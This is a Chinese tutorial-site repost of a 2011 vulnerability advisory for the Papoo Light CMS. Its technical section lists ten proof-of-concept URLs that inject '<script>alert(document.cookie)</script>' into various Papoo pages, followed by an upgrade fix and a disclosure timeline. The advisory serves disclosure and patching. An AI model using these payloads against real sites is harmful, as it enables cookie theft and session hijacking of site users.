网站地图    收藏   

主页 > 后端 > 网站安全 >

CMS Papoo Light版多个xss缺陷及修复 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 缺陷概述:==========================The CMS Papoo Light Version含xss缺陷==================技术分析:==================http://www.2cto.com /papoo/papoo_light/index.php//ascriptalert(docume......

缺陷概述:
==========================

The CMS Papoo Light Version含xss缺陷

==================
技术分析:
==================

http://www.2cto.com /papoo/papoo_light/index.php/"></a><script>alert(document
.cookie);</script>
http://vip.2cto.com /papoo/papoo_light/kontakt.php/"></a><script>alert(docume
nt.cookie);</script>
http://bbs.2cto.com /papoo/papoo_light/inhalt.php/"></a><script>alert(documen
t.cookie);</script>
http://www.honhei.com /papoo/papoo_light/forum.php/"></a><script>alert(document
.cookie);</script>
http://www.2cto.com /papoo/papoo_light/guestbook.php/"></a><script>alert(docu
ment.cookie);</script>
http://www.2cto.com /papoo/papoo_light/account.php/"></a><script>alert(docume
nt.cookie);</script>
http://www.2cto.com /papoo/papoo_light/login.php/"></a><script>alert(document
.cookie);</script>
http://www.2cto.com papoo/papoo_light/index/"></a><script>alert(document.coo
kie);</script>
http://www.2cto.com /papoo/papoo_light/forumthread.php/"></a><script>alert(do
cument.cookie);</script>
http://www.2cto.com /papoo/papoo_light/forum/"></a><script>alert(document.coo
kie);</script>

=========
修复方案:
=========
升级到最新版

====================
Disclosure Timeline:
====================

12-Sep-2011 - informed the developers
12-Sep-2011 - release date of this security advisory
12-Sep-2011 - response and fix by vendor
12-sep-2011 - post on BugTraq

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论